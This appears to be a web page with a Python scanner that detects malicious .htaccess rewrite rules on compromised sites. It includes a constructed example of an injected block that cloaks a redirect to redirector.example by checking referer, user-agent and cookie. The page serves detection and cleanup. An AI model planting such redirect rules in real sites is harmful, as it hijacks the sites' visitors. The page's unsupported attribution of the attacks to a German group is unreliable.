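A scan of this kind, as an added example in Python (it is not the author's scan.php, whose source is not shown on this page): it walks every directory, reads each .htaccess, and reports RewriteRule lines that send visitors to a host other than your own, together with the referer, user-agent and cookie conditions guarding them. The host names, marker text and directory layout in the sample are constructed for illustration.

```python
import os
import re
import tempfile
from urllib.parse import urlsplit

COND_VAR = re.compile(r"^\s*RewriteCond\s+%\{(\w+)\}", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
CLOAK_VARS = {"HTTP_REFERER", "HTTP_USER_AGENT", "HTTP_COOKIE"}

def scan_htaccess(text, own_hosts):
    """Return (line_no, host, cloaking_vars) for each rule that leaves the site."""
    findings, cond_vars = [], set()
    for line_no, line in enumerate(text.splitlines(), 1):
        cond = COND_VAR.match(line)
        if cond:
            cond_vars.add(cond.group(1).upper())
            continue
        rule = RULE.match(line)
        if not rule:
            continue
        try:
            host = (urlsplit(rule.group(1)).hostname or "").lower()
        except ValueError:
            host = ""
        # An absolute URL on another host makes mod_rewrite redirect externally.
        if host and host not in own_hosts:
            findings.append((line_no, host, sorted(cond_vars & CLOAK_VARS)))
        cond_vars = set()   # conditions apply only to the rule that follows them
    return findings

def scan_tree(root, own_hosts):
    """Scan every .htaccess under root; return {relative_path: findings}."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_htaccess(fh.read(), own_hosts)
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits

# Constructed sample files: a legitimate file and an injected block.
CLEAN = r"""RewriteEngine On
RewriteCond %{HTTP_HOST} !^www.shop.example$
RewriteRule ^(.*) http://www.shop.example/$1 [R=301,L]
RewriteCond %{REQUEST_URI} ^/p/(.*)/(.*) [NC]
RewriteRule (.*) /mm5/merchant.mvc?Screen=PROD&Product_Code=%1&Store_Code=N [L]
"""
INJECTED = r"""# marker
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google\.|yahoo\.|bing\.) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|curl|wget) [NC]
RewriteCond %{HTTP_COOKIE} !seen
RewriteRule ^(.*)$ http://redirector.example/r.cgi?h=%{HTTP_HOST} [R=302,L,CO=seen:1:%{HTTP_HOST}:10080]
# marker
"""

def demo():
    """Build a constructed site tree with one infected subdirectory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        sub = os.path.join(root, "images", "thumbs")
        os.makedirs(sub)
        for folder, body in ((root, CLEAN), (sub, CLEAN + INJECTED)):
            with open(os.path.join(folder, ".htaccess"), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root, {"www.shop.example"})

if __name__ == "__main__":
    for path, found in demo().items():
        print(path, found)
```

Pass your real document root and your own host names to scan_tree(); the site's own www redirect is ignored because its target host is in own_hosts.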

Sniff is the URL extracted from the .htaccess, which I started investigating - in progress:
sniff.php --Run it on THIS server
sniff.php -- View source

We also have learned that the main one is a group out of Germany!


We put this here as a public service and did not intend to make money with it.
If you are being attacked, can't do this yourself and need technical assistance, we can do it for you for a small charge.
Member of Software Contractors' Guild and Guru Freelancer. Just email us at webmaster@

We welcome your comments, or just drop us a line webmaster@

Cheers :)
